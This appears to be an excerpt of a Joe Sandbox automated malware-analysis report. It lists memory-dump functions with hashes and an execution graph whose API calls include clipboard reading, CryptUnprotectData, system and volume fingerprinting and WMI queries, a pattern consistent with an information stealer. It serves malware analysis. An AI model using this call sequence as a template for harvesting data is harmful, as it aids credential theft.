                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                    • String ID:
                                                                                    • API String ID: 2744216297-0
                                                                                    • Opcode ID: 69c996956157c2aa4655bc3989d877d820f843b51cf169969ff6af294f030339
                                                                                    • Instruction ID: 0a2bb7cdb46cf1ec0a63128ff81cc61fb9ca4319abe2a289467f20f37df64d85
                                                                                    • Opcode Fuzzy Hash: 69c996956157c2aa4655bc3989d877d820f843b51cf169969ff6af294f030339
                                                                                    • Instruction Fuzzy Hash: 18F01C36654158BBCF121F92CD04ADE3FB6EB097A8B154018FA1885E21C7328C70DB90
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 6CE1227D
                                                                                      • Part of subcall function 6CE12F43: HeapFree.KERNEL32(00000000,00000000,?,6CE1217C), ref: 6CE12F59
                                                                                      • Part of subcall function 6CE12F43: GetLastError.KERNEL32(?,?,6CE1217C), ref: 6CE12F6B
                                                                                    • _free.LIBCMT ref: 6CE12290
                                                                                    • _free.LIBCMT ref: 6CE122A1
                                                                                    • _free.LIBCMT ref: 6CE122B2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 48bf10ea455b1ab5801002f25753651187c0ce755337a0e10fa81122cf2e5fad
                                                                                    • Instruction ID: ea3d07a365e2d3d084773b01273b7fe0060604698a5c5cb41f89156c589ed08c
                                                                                    • Opcode Fuzzy Hash: 48bf10ea455b1ab5801002f25753651187c0ce755337a0e10fa81122cf2e5fad
                                                                                    • Instruction Fuzzy Hash: 7BE0BF71B382609A8E21BF2BE8054A77A71E76F644721804AE40562F20D7B516669FC5
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6CE0FE34
                                                                                    • ___raise_securityfailure.LIBCMT ref: 6CE0FF1C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                    • String ID: WVC
                                                                                    • API String ID: 3761405300-1100534715
                                                                                    • Opcode ID: 300fe27b58fa5e8dc6199226cb4eb1d24217f02c388ac4a7b2bb8f4dcffa6958
                                                                                    • Instruction ID: cbdc0624555612a8068ee9a4f9af24fb2761d3b2cae1b94132afaec08b931c46
                                                                                    • Opcode Fuzzy Hash: 300fe27b58fa5e8dc6199226cb4eb1d24217f02c388ac4a7b2bb8f4dcffa6958
                                                                                    • Instruction Fuzzy Hash: 9F21EDB6B60204DBEF00EF2BD1956623BB4BB0B714F60412AE5088B792E3B45595CF94
                                                                                    APIs
                                                                                      • Part of subcall function 6CE165AF: EnterCriticalSection.KERNEL32(00000001,?,6CE16FEE,?,6CE1F400,00000010,6CE15107,00000000,00000000,?,?,?,?,6CE1514B,?,00000000), ref: 6CE165CA
                                                                                    • FlushFileBuffers.KERNEL32(00000000,6CE1F3E0,0000000C,6CE167F7,dPl,?,00000001,?,6CE15064,?), ref: 6CE16739
                                                                                    • GetLastError.KERNEL32 ref: 6CE1674A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffersCriticalEnterErrorFileFlushLastSection
                                                                                    • String ID: dPl
                                                                                    • API String ID: 4109680722-1338324705
                                                                                    • Opcode ID: 514e630c6f51bcda2398813e1c375e223cff6d7496610423b8829b6aa63ec206
                                                                                    • Instruction ID: ca130bd309629394b5a10d99e71cff63ddfc0c81b8d1c6f760b6b4d0c2ecf613
                                                                                    • Opcode Fuzzy Hash: 514e630c6f51bcda2398813e1c375e223cff6d7496610423b8829b6aa63ec206
                                                                                    • Instruction Fuzzy Hash: CE01B971A04314DFC7019FB8D94469D7BB4EF49728F20451EE411DBFD0D77498558B90
                                                                                    APIs
                                                                                      • Part of subcall function 6CE1432B: GetEnvironmentStringsW.KERNEL32 ref: 6CE14334
                                                                                      • Part of subcall function 6CE1432B: _free.LIBCMT ref: 6CE14393
                                                                                      • Part of subcall function 6CE1432B: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CE143A2
                                                                                    • _free.LIBCMT ref: 6CE11EBD
                                                                                    • _free.LIBCMT ref: 6CE11EC4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$EnvironmentStrings$Free
                                                                                    • String ID: xC
                                                                                    • API String ID: 2490078468-4061282587
                                                                                    • Opcode ID: 0c57fde14651a3efad38accc7109efd3f6810897c38ccc21ededa0f1e7bd32a8
                                                                                    • Instruction ID: c41fcc88b46f27345925ae08a5c2c170c9f2cb7c2c9767c18483533efb5be075
                                                                                    • Opcode Fuzzy Hash: 0c57fde14651a3efad38accc7109efd3f6810897c38ccc21ededa0f1e7bd32a8
                                                                                    • Instruction Fuzzy Hash: ABE06512E4D99005A62126AF6C4269A1A715BD733CB75039BD520DAFC1EB60C5260597
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: CommandLine
                                                                                    • String ID: @"
                                                                                    • API String ID: 3253501508-3772326458
                                                                                    • Opcode ID: 388bed80472ba4553cd83a7913e6e3a55a619737a9ecceb727c22fac93b4a8a1
                                                                                    • Instruction ID: fdb36354545647f7d800cd6a05cf7d151f4d5287a3e76116522e39a85058908d
                                                                                    • Opcode Fuzzy Hash: 388bed80472ba4553cd83a7913e6e3a55a619737a9ecceb727c22fac93b4a8a1
                                                                                    • Instruction Fuzzy Hash: 79B04878B513008FCF00AF318089166BAB0F32A2123806057D80AC2A00E736106AAA50

                                                                                    Execution Graph

                                                                                    Execution Coverage:9.2%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:20.2%
                                                                                    Total number of Nodes:377
                                                                                    Total number of Limit Nodes:29
                                                                                    execution_graph 13665 8cde0c 13668 8b4110 13665->13668 13667 8cde11 CoSetProxyBlanket 13668->13667 13669 8c29cd 13670 8c2aa0 13669->13670 13673 8c29e0 13669->13673 13671 8c2d9c 13671->13671 13674 8c2def 13671->13674 13675 8c31c0 RtlExpandEnvironmentStrings 13671->13675 13672 8c2b58 13672->13671 13672->13672 13672->13674 13709 8dd910 LdrInitializeThunk 13672->13709 13673->13670 13673->13672 13673->13673 13678 8c2fcf 13673->13678 13677 8c3210 13675->13677 13676 8c35e1 13694 8c1060 13676->13694 13677->13676 13682 8c32b4 13677->13682 13683 8c328c RtlExpandEnvironmentStrings 13677->13683 13684 8c32dc 13677->13684 13686 8c3448 13677->13686 13689 8c3420 13677->13689 13710 8dd910 LdrInitializeThunk 13678->13710 13683->13676 13683->13682 13683->13684 13683->13686 13683->13689 13690 8e0ba0 13684->13690 13685 8c3591 GetLogicalDrives 13688 8e0ba0 LdrInitializeThunk 13685->13688 13686->13685 13688->13682 13689->13676 13689->13682 13689->13686 13691 8e0bc0 13690->13691 13692 8e0d1e 13691->13692 13711 8dd910 LdrInitializeThunk 13691->13711 13692->13689 13712 8e09e0 13694->13712 13696 8c184f 13696->13682 13697 8c10a3 13697->13696 13716 8dbc90 13697->13716 13699 8c10e1 13706 8c1199 13699->13706 13719 8dd910 LdrInitializeThunk 13699->13719 13700 8c1789 13702 8dbcb0 RtlFreeHeap 13700->13702 13704 8c179b 13702->13704 13703 8dbc90 RtlAllocateHeap 13703->13706 13704->13696 13725 8dd910 LdrInitializeThunk 13704->13725 13706->13700 13706->13703 13720 8dd910 LdrInitializeThunk 13706->13720 13721 8dbcb0 13706->13721 13709->13672 13710->13674 13711->13692 13713 8e0a00 13712->13713 13714 8e0b4e 13713->13714 13726 8dd910 LdrInitializeThunk 13713->13726 13714->13697 13727 8df000 13716->13727 13718 8dbc9a RtlAllocateHeap 13718->13699 13719->13699 13720->13706 13722 8dbcd4 13721->13722 13723 8dbcc3 13721->13723 13722->13706 13724 8dbcc8 RtlFreeHeap 13723->13724 13724->13722 13725->13704 13726->13714 13728 8df010 13727->13728 13728->13718 13728->13728 13729 8cb94d 13731 8cb959 13729->13731 13730 8cba3b GetComputerNameExA 13731->13730 13731->13731 13732 8ade48 13736 8a95a0 13732->13736 13734 8ade54 CoUninitialize 13735 8ade80 13734->13735 13737 8a95b4 13736->13737 13737->13734 13738 8d6805 13739 8d681d 13738->13739 13740 8d6831 GetUserDefaultUILanguage 13739->13740 13741 8d6858 13740->13741 13742 8a8640 13744 8a864f 13742->13744 13743 8a88e6 ExitProcess 13744->13743 13745 8a8664 GetCurrentProcessId GetCurrentThreadId 13744->13745 13753 8a88cf 13744->13753 13747 8a868c 13745->13747 13748 8a8690 SHGetSpecialFolderPathW 13745->13748 13747->13748 13749 8a8770 13748->13749 13749->13749 13750 8dbc90 RtlAllocateHeap 13749->13750 13751 8a8797 GetForegroundWindow 13750->13751 13754 8a8811 13751->13754 13759 8dd860 13753->13759 13754->13753 13758 8ac660 CoInitializeEx 13754->13758 13762 8defe0 13759->13762 13761 8dd865 FreeLibrary 13761->13743 13763 8defe9 13762->13763 13763->13761 13764 8adc41 13765 8adc51 13764->13765 13794 8c37d0 13765->13794 13767 8adc77 13807 8c3a60 13767->13807 13769 8adc97 13820 8c5850 13769->13820 13775 8adcc9 13855 8c7cb0 13775->13855 13777 8adcf2 13867 8d2d70 OpenClipboard 13777->13867 13779 8add1b 13780 8c37d0 5 API calls 13779->13780 13781 8add56 13780->13781 13782 8c3a60 4 API calls 13781->13782 13783 8add76 13782->13783 13784 8c5850 4 API calls 13783->13784 13785 8add96 13784->13785 13786 8c6000 3 API calls 13785->13786 13787 8add9f 13786->13787 13788 8c6340 3 API calls 13787->13788 13789 8adda8 13788->13789 13790 8c7cb0 3 API calls 13789->13790 13791 8addd1 13790->13791 13792 8d2d70 6 API calls 13791->13792 13793 8addfa 13792->13793 13795 8c3860 13794->13795 13795->13795 13796 8c3876 RtlExpandEnvironmentStrings 13795->13796 13797 8c38c0 13796->13797 13799 8c395e 13797->13799 13800 8c3bf1 13797->13800 13802 8c3939 RtlExpandEnvironmentStrings 13797->13802 13806 8c3a3b 13797->13806 13881 8dfe20 13797->13881 13877 8bef80 13799->13877 13891 8dfb80 13800->13891 13802->13797 13802->13799 13802->13800 13802->13806 13804 8c3c2a 13804->13806 13901 8dfa50 13804->13901 13806->13767 13808 8c3a6e 13807->13808 13809 8dfa50 LdrInitializeThunk 13808->13809 13811 8c3922 13809->13811 13810 8dfe20 3 API calls 13810->13811 13811->13810 13812 8c3bf1 13811->13812 13813 8c395e 13811->13813 13816 8c3939 RtlExpandEnvironmentStrings 13811->13816 13819 8c3a3b 13811->13819 13814 8dfb80 3 API calls 13812->13814 13815 8bef80 3 API calls 13813->13815 13817 8c3c2a 13814->13817 13815->13819 13816->13811 13816->13812 13816->13813 13816->13819 13818 8dfa50 LdrInitializeThunk 13817->13818 13817->13819 13818->13817 13819->13769 13821 8c5ad0 13820->13821 13823 8c5876 13820->13823 13829 8adcb7 13820->13829 13830 8c5b04 13820->13830 13910 8dd880 13821->13910 13822 8dfa50 LdrInitializeThunk 13822->13830 13823->13821 13823->13823 13824 8dfe20 3 API calls 13823->13824 13826 8dfa50 LdrInitializeThunk 13823->13826 13823->13829 13823->13830 13824->13823 13826->13823 13827 8dfb80 3 API calls 13827->13830 13832 8c6000 13829->13832 13830->13822 13830->13827 13830->13829 13831 8dd910 LdrInitializeThunk 13830->13831 13919 8e0480 13830->13919 13831->13830 13833 8c6020 13832->13833 13834 8c606e 13833->13834 13931 8dd910 LdrInitializeThunk 13833->13931 13835 8adcc0 13834->13835 13836 8dbc90 RtlAllocateHeap 13834->13836 13842 8c6340 13835->13842 13840 8c60e1 13836->13840 13838 8c614e 13838->13838 13839 8dbcb0 RtlFreeHeap 13838->13839 13839->13835 13840->13838 13932 8dd910 LdrInitializeThunk 13840->13932 13933 8c6360 13842->13933 13844 8c6354 13844->13775 13845 8c6349 13845->13844 13953 8d98a0 13845->13953 13847 8c6c18 13848 8c6d75 13847->13848 13849 8e09e0 LdrInitializeThunk 13847->13849 13851 8c6f6f 13847->13851 13854 8c6c42 13847->13854 13848->13851 13848->13854 13960 8e0e50 13848->13960 13966 8e0d70 13848->13966 13849->13848 13970 8dd910 LdrInitializeThunk 13851->13970 13854->13775 13856 8c7d60 13855->13856 13856->13856 13857 8c7d86 RtlExpandEnvironmentStrings 13856->13857 13859 8c7de0 13857->13859 13858 8c7e5b 13858->13777 13859->13858 13860 8c7e38 RtlExpandEnvironmentStrings 13859->13860 13861 8c7e75 13859->13861 13863 8c8120 13859->13863 13860->13858 13860->13861 13860->13863 13861->13858 13862 8e0d70 LdrInitializeThunk 13861->13862 13861->13863 13866 8c8258 13861->13866 13862->13861 13863->13863 13864 8e09e0 LdrInitializeThunk 13863->13864 13864->13866 13865 8e09e0 LdrInitializeThunk 13865->13866 13866->13865 13866->13866 13868 8d2d9a GetClipboardData 13867->13868 13869 8d2d95 13867->13869 13870 8d2fc8 CloseClipboard 13868->13870 13871 8d2db7 GlobalLock 13868->13871 13869->13779 13870->13869 13872 8d2dd1 13871->13872 13874 8d2dd6 13871->13874 13872->13870 13873 8d2fb8 GlobalUnlock 13873->13872 13874->13873 13875 8d2e0e GetWindowLongW 13874->13875 13876 8d2e78 13875->13876 13876->13873 13878 8befb0 13877->13878 13878->13878 13879 8c1060 3 API calls 13878->13879 13880 8befd9 13879->13880 13880->13806 13882 8dfe40 13881->13882 13884 8dfeae 13882->13884 13905 8dd910 LdrInitializeThunk 13882->13905 13883 8e0118 13883->13797 13884->13883 13886 8dbc90 RtlAllocateHeap 13884->13886 13888 8dff1a 13886->13888 13887 8dbcb0 RtlFreeHeap 13887->13883 13890 8dffae 13888->13890 13906 8dd910 LdrInitializeThunk 13888->13906 13890->13887 13892 8dfba0 13891->13892 13893 8dfc0e 13892->13893 13907 8dd910 LdrInitializeThunk 13892->13907 13894 8dbc90 RtlAllocateHeap 13893->13894 13898 8dfe08 13893->13898 13896 8dfc7a 13894->13896 13900 8dfd0e 13896->13900 13908 8dd910 LdrInitializeThunk 13896->13908 13897 8dbcb0 RtlFreeHeap 13897->13898 13898->13804 13900->13897 13900->13900 13903 8dfa70 13901->13903 13902 8dfb4f 13902->13804 13903->13902 13909 8dd910 LdrInitializeThunk 13903->13909 13905->13884 13906->13890 13907->13893 13908->13900 13909->13902 13911 8dd899 13910->13911 13912 8dd8e5 13910->13912 13914 8dd8a7 13911->13914 13915 8dd8f0 13911->13915 13916 8dd8d0 RtlReAllocateHeap 13911->13916 13917 8dd8e3 13911->13917 13913 8dbc90 RtlAllocateHeap 13912->13913 13913->13917 13914->13916 13918 8dbcb0 RtlFreeHeap 13915->13918 13916->13917 13917->13830 13918->13917 13920 8e048f 13919->13920 13921 8e05ef 13920->13921 13929 8dd910 LdrInitializeThunk 13920->13929 13922 8dbc90 RtlAllocateHeap 13921->13922 13927 8e080f 13921->13927 13924 8e0675 13922->13924 13926 8e074e 13924->13926 13930 8dd910 LdrInitializeThunk 13924->13930 13925 8dbcb0 RtlFreeHeap 13925->13927 13926->13925 13927->13830 13929->13921 13930->13926 13931->13834 13932->13838 13934 8c63a0 13933->13934 13934->13934 13971 8dbce0 13934->13971 13941 8c67cc 13941->13845 13942 8c6425 13997 8dc100 13942->13997 13944 8c6a1b 13944->13845 13945 8e09e0 LdrInitializeThunk 13944->13945 13950 8c6d75 13945->13950 13946 8c64fc 13946->13941 13946->13942 13946->13944 13993 8dc440 13946->13993 13947 8e0d70 LdrInitializeThunk 13947->13950 13948 8e0e50 LdrInitializeThunk 13948->13950 13949 8c6f6f 14001 8dd910 LdrInitializeThunk 13949->14001 13950->13947 13950->13948 13950->13949 13952 8c6f09 13950->13952 13952->13845 13958 8d98d0 13953->13958 13954 8dfa50 LdrInitializeThunk 13954->13958 13955 8dfe20 3 API calls 13955->13958 13956 8d9a1c 13956->13847 13957 8e0480 3 API calls 13957->13958 13958->13954 13958->13955 13958->13956 13958->13957 14009 8dd910 LdrInitializeThunk 13958->14009 13961 8e0e70 13960->13961 13961->13961 13964 8e0ede 13961->13964 14010 8dd910 LdrInitializeThunk 13961->14010 13963 8e0f9e 13963->13848 13964->13963 14011 8dd910 LdrInitializeThunk 13964->14011 13967 8e0d90 13966->13967 13968 8e0dfe 13967->13968 14012 8dd910 LdrInitializeThunk 13967->14012 13968->13848 13970->13854 13972 8dbd00 13971->13972 13973 8dbd5e 13972->13973 14002 8dd910 LdrInitializeThunk 13972->14002 13974 8dbc90 RtlAllocateHeap 13973->13974 13978 8c640d 13973->13978 13976 8dbe0f 13974->13976 13980 8dbe8f 13976->13980 14003 8dd910 LdrInitializeThunk 13976->14003 13977 8dbcb0 RtlFreeHeap 13977->13978 13981 8dbf90 13978->13981 13980->13977 13982 8c6419 13981->13982 13983 8dbfa2 13981->13983 13982->13942 13982->13946 13985 8dc510 13982->13985 13983->13982 14004 8dd910 LdrInitializeThunk 13983->14004 13987 8dc560 13985->13987 13986 8dcd0e 13986->13946 13992 8dc5be 13987->13992 14005 8dd910 LdrInitializeThunk 13987->14005 13989 8dcca2 13989->13986 14006 8dd910 LdrInitializeThunk 13989->14006 13991 8dd910 LdrInitializeThunk 13991->13992 13992->13986 13992->13989 13992->13991 13994 8dc460 13993->13994 13996 8dc4ce 13994->13996 14007 8dd910 LdrInitializeThunk 13994->14007 13996->13946 13998 8dc17e 13997->13998 13999 8dc10a 13997->13999 13998->13944 13999->13998 14008 8dd910 LdrInitializeThunk 13999->14008 14001->13941 14002->13973 14003->13980 14004->13982 14005->13992 14006->13986 14007->13996 14008->13998 14009->13958 14010->13964 14011->13963 14012->13968 14013 8c09c0 14014 8c0a20 14013->14014 14015 8c09ce 14013->14015 14017 8c0ae0 14015->14017 14018 8c0af0 14017->14018 14018->14018 14019 8e0ba0 LdrInitializeThunk 14018->14019 14020 8c0bbf 14019->14020 14021 8cc282 14022 8cc28c 14021->14022 14023 8cc34d GetPhysicallyInstalledSystemMemory 14022->14023 14024 8cc390 14023->14024 14024->14024 14025 8cb842 14026 8cb84e FreeLibrary 14025->14026 14029 8cb87b 14026->14029 14028 8cb90b GetComputerNameExA 14030 8cb946 14028->14030 14029->14028 14029->14029 14030->14030 14031 8ddb42 14032 8ddb70 14031->14032 14033 8ddbce 14032->14033 14038 8dd910 LdrInitializeThunk 14032->14038 14037 8dd910 LdrInitializeThunk 14033->14037 14036 8ddcd1 14037->14036 14038->14033 14039 8ac69e CoInitializeSecurity 14040 8a9d5e 14041 8a9d80 14040->14041 14041->14041 14042 8a9e16 LoadLibraryExW 14041->14042 14043 8a9e27 14042->14043 14044 8ad9d4 14045 8ada70 14044->14045 14045->14045 14046 8adabe 14045->14046 14048 8dd910 LdrInitializeThunk 14045->14048 14048->14046 14049 8ddce9 14050 8ddd10 14049->14050 14053 8ddd6e 14050->14053 14055 8dd910 LdrInitializeThunk 14050->14055 14052 8de21e 14053->14052 14056 8dd910 LdrInitializeThunk 14053->14056 14055->14053 14056->14052 14057 8de6a5 GetForegroundWindow 14058 8de6b3 14057->14058 14059 8b9362 14060 8b9380 14059->14060 14063 8b93ee 14060->14063 14065 8dd910 LdrInitializeThunk 14060->14065 14062 8b933a 14063->14062 14063->14063 14064 8b97d1 CryptUnprotectData 14063->14064 14064->14063 14065->14063 14066 8dbce0 14067 8dbd00 14066->14067 14068 8dbd5e 14067->14068 14076 8dd910 LdrInitializeThunk 14067->14076 14069 8dbc90 RtlAllocateHeap 14068->14069 14073 8dbf5e 14068->14073 14071 8dbe0f 14069->14071 14075 8dbe8f 14071->14075 14077 8dd910 LdrInitializeThunk 14071->14077 14072 8dbcb0 RtlFreeHeap 14072->14073 14075->14072 14076->14068 14077->14075 14078 8de262 14080 8de2a0 14078->14080 14079 8de42e 14080->14079 14082 8dd910 LdrInitializeThunk 14080->14082 14082->14079 14083 8ad6f8 14084 8ad720 14083->14084 14087 8d8860 14084->14087 14086 8ad88d 14086->14086 14088 8d8890 CoCreateInstance 14087->14088 14090 8d8ed5 14088->14090 14091 8d8af5 SysAllocString 14088->14091 14092 8d8ee5 GetVolumeInformationW 14090->14092 14094 8d8b83 14091->14094 14101 8d8f03 14092->14101 14095 8d8b8b CoSetProxyBlanket 14094->14095 14096 8d8ec5 SysFreeString 14094->14096 14097 8d8ebb 14095->14097 14098 8d8bab SysAllocString 14095->14098 14096->14090 14097->14096 14100 8d8c70 14098->14100 14100->14100 14102 8d8ca8 SysAllocString 14100->14102 14101->14086 14105 8d8ccf 14102->14105 14103 8d8ea9 SysFreeString SysFreeString 14103->14097 14104 8d8e9f 14104->14103 14105->14103 14105->14104 14106 8d8d17 VariantInit 14105->14106 14108 8d8d70 14106->14108 14107 8d8e8e VariantClear 14107->14104 14108->14107 14109 8b8df1 14110 8b8fbd 14109->14110 14111 8b8dfd 14109->14111 14111->14111 14112 8e0ba0 LdrInitializeThunk 14111->14112 14112->14110 14113 8cc736 14115 8cc770 14113->14115 14114 8cc89e 14115->14114 14117 8dd910 LdrInitializeThunk 14115->14117 14117->14114 14123 8d84f0 14124 8d8515 14123->14124 14127 8d85f2 14124->14127 14132 8dd910 LdrInitializeThunk 14124->14132 14125 8d87f0 14127->14125 14129 8d86e7 14127->14129 14131 8dd910 LdrInitializeThunk 14127->14131 14129->14125 14133 8dd910 LdrInitializeThunk 14129->14133 14131->14127 14132->14124 14133->14129 14134 8d16b2 CoSetProxyBlanket

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 8d8860-8d8889 1 8d8890-8d88c2 0->1 1->1 2 8d88c4-8d88d9 1->2 3 8d88e0-8d8912 2->3 3->3 4 8d8914-8d8954 3->4 5 8d8960-8d8988 4->5 5->5 6 8d898a-8d89a3 5->6 8 8d8a1a-8d8a23 6->8 9 8d89a5-8d89af 6->9 11 8d8a30-8d8a96 8->11 10 8d89b0-8d89c9 9->10 10->10 12 8d89cb-8d89de 10->12 11->11 13 8d8a98-8d8aef CoCreateInstance 11->13 14 8d89e0-8d8a0e 12->14 15 8d8ed5-8d8f01 call 8df450 GetVolumeInformationW 13->15 16 8d8af5-8d8b29 13->16 14->14 18 8d8a10-8d8a15 14->18 22 8d8f0b-8d8f0d 15->22 23 8d8f03-8d8f07 15->23 19 8d8b30-8d8b59 16->19 18->8 19->19 21 8d8b5b-8d8b85 SysAllocString 19->21 26 8d8b8b-8d8ba5 CoSetProxyBlanket 21->26 27 8d8ec5-8d8ed1 SysFreeString 21->27 25 8d8f1d-8d8f28 22->25 23->22 28 8d8f2a-8d8f31 25->28 29 8d8f34-8d8f46 25->29 30 8d8ebb-8d8ec1 26->30 31 8d8bab-8d8bbb 26->31 27->15 28->29 32 8d8f50-8d8fb0 29->32 30->27 33 8d8bc0-8d8be3 31->33 32->32 34 8d8fb2-8d8fe7 32->34 33->33 35 8d8be5-8d8c65 SysAllocString 33->35 36 8d8ff0-8d903a 34->36 37 8d8c70-8d8ca6 35->37 36->36 38 8d903c-8d906d call 8bdc90 36->38 37->37 40 8d8ca8-8d8cd5 SysAllocString 37->40 42 8d9070-8d9078 38->42 45 8d8ea9-8d8eb9 SysFreeString * 2 40->45 46 8d8cdb-8d8cfd 40->46 42->42 44 8d907a-8d907c 42->44 47 8d8f10-8d8f17 44->47 48 8d9082-8d9092 call 8a8060 44->48 45->30 53 8d8e9f-8d8ea5 46->53 54 8d8d03-8d8d06 46->54 47->25 50 8d9097-8d909e 47->50 48->47 53->45 54->53 55 8d8d0c-8d8d11 54->55 55->53 56 8d8d17-8d8d62 VariantInit 55->56 57 8d8d70-8d8d99 56->57 57->57 58 8d8d9b-8d8dad 57->58 59 8d8db1-8d8db3 58->59 60 8d8e8e-8d8e9b VariantClear 59->60 61 8d8db9-8d8dbf 59->61 60->53 61->60 62 8d8dc5-8d8dd3 61->62 63 8d8e0d 62->63 64 8d8dd5-8d8dda 62->64 66 8d8e0f-8d8e4d call 8a7ed0 call 8a8d20 63->66 65 8d8dec-8d8df0 64->65 68 8d8de0 65->68 69 8d8df2-8d8dfb 65->69 77 8d8e7d-8d8e8a call 8a7ee0 66->77 78 8d8e4f-8d8e65 66->78 71 8d8de1-8d8dea 68->71 72 8d8dfd-8d8e00 69->72 73 8d8e02-8d8e06 69->73 71->65 71->66 72->71 73->71 75 8d8e08-8d8e0b 73->75 75->71 77->60 78->77 79 8d8e67-8d8e74 78->79 79->77 81 8d8e76-8d8e79 79->81 81->77
                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(008E368C,00000000,00000001,008E367C), ref: 008D8AE7
                                                                                    • SysAllocString.OLEAUT32(k2`0), ref: 008D8B60
                                                                                    • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 008D8B9D
                                                                                    • SysAllocString.OLEAUT32(07B705B3), ref: 008D8BEA
                                                                                    • SysAllocString.OLEAUT32(09C50FBD), ref: 008D8CAD
                                                                                    • VariantInit.OLEAUT32(EFEEEDF4), ref: 008D8D1C
                                                                                    • VariantClear.OLEAUT32(?), ref: 008D8E8F
                                                                                    • SysFreeString.OLEAUT32(?), ref: 008D8EB3
                                                                                    • SysFreeString.OLEAUT32(?), ref: 008D8EB9
                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 008D8EC6
                                                                                    • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 008D8EFA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
